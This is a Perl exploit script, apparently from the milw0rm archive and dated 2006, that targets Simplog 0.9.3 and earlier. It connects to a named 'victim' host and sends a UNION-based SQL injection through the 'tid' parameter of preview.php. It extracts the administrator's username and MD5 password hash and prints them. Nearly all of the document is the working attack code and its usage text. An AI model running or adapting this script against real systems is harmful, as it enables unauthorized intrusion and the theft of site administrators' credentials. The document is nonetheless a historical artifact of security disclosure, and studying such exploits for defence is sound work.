Simplog <= 0.9.3 (tid) Remote SQL Injection Exploit :

Date : 2006-04-21 Author : nukedx
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=25
#Usage: simplog.pl <host> <path>
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
  print "
- NukedX Security Advisory Nr.2006-25
";
  print "- Simplog <= 0.93 Remote SQL Injection Exploit
";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path>
";
  print "- <host> -> Victim's host ex: www.victim.com
";
  print "- <path> -> Path to Simplog ex: /simplog/
";
  exit();
}
sub exploit () 
{
  #Our variables...
  $spserver = $ARGV[0];
  $spserver =~ s/(http://)//eg;
  $sphost   = "http://".$spserver;
  $spdir    = $ARGV[1];
  $spport   = "80";
  $sptar    = "preview.php?adm=tem&blogid=1&tid=";
  $spxp     = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*";
  $spreq    = $sphost.$spdir.$sptar.$spxp;
  #Sending data...
  header();
  print "- Trying to connect: $spserver
";
  $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...
";
  print $sp "GET $spreq HTTP/1.1
";
  print $sp "Accept: */*
";
  print $sp "Referer: $sphost
";
  print $sp "Accept-Language: tr
";
  print $sp "User-Agent: NukeZilla
";
  print $sp "Cache-Control: no-cache
";
  print $sp "Host: $spserver
";
  print $sp "Connection: close

";
  print "- Connected...
";
  while ($answer = <$sp>) {
    if ($answer =~ /25552(.*?)25553([d,a-f]{32})25554/) {
      print "- Exploit succeed!
";
      print "- Username: $1
";
      print "- MD5 HASH of PASSWORD: $2
";
      exit();
    }
  }
  #Exploit failed...
  print "- Exploit failed
"
}

# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]

C1

 

C2

 

C3